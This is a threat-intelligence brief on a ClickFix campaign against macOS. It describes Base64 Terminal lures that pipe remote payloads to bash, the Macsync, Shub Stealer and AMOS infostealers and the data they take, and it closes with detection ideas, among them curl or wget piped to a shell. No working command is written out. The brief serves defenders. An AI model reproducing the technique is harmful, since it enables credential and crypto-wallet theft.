ClickFix campaign expands to macOS — Macsync, Shub Stealer and AMOS delivered via Base64 Terminal commands that bypass Gatekeeper

Microsoft Threat Intelligence on 2026-05-06 documented an active ClickFix social-engineering campaign now targeting macOS users via fake utility-installation guides hosted on Medium, Squarespace, and Craft-built blogs (Microsoft Security Blog, 2026-05-06 · Malwarebytes — Shub Stealer earlier wave, 2026-03). The lure pages instruct the visitor to copy a Base64-encoded command into Terminal; the decoded one-liner pipes a remote shell payload directly to bash, bypassing Gatekeeper because no signed application bundle is ever launched. Three distinct infostealers — Macsync, Shub Stealer, and AMOS (Atomic macOS Stealer) — are delivered across campaign variants per Microsoft, harvesting macOS Keychain entries, browser-profile credentials, iCloud data, and cryptocurrency wallet keys (Trezor, Ledger, Exodus, Electrum, Atomic, Coinomi, MetaMask, Phantom). Some variants substitute backdoored DMG copies of legitimate wallet applications (Ledger Live, Trezor Suite). Persistence uses LaunchAgent / LaunchDaemon plists with Telegram-fallback C2.

ATT&CK mapping: T1204.002 User Execution: Malicious File, T1059.004 Unix Shell, T1555.001 Credentials from Password Stores: Keychain. Detection concepts: alert on Terminal spawning curl / wget immediately followed by pipe-to-shell execution from a non-developer profile; LaunchAgent file-creation events from outside /Applications or /Library/Application Support/<vendor> paths; anomalous Keychain API calls from processes without UI entitlements (Endpoint Security framework ES_EVENT_TYPE_NOTIFY_OPENSSH-style hooks expose this on EDR-instrumented Macs).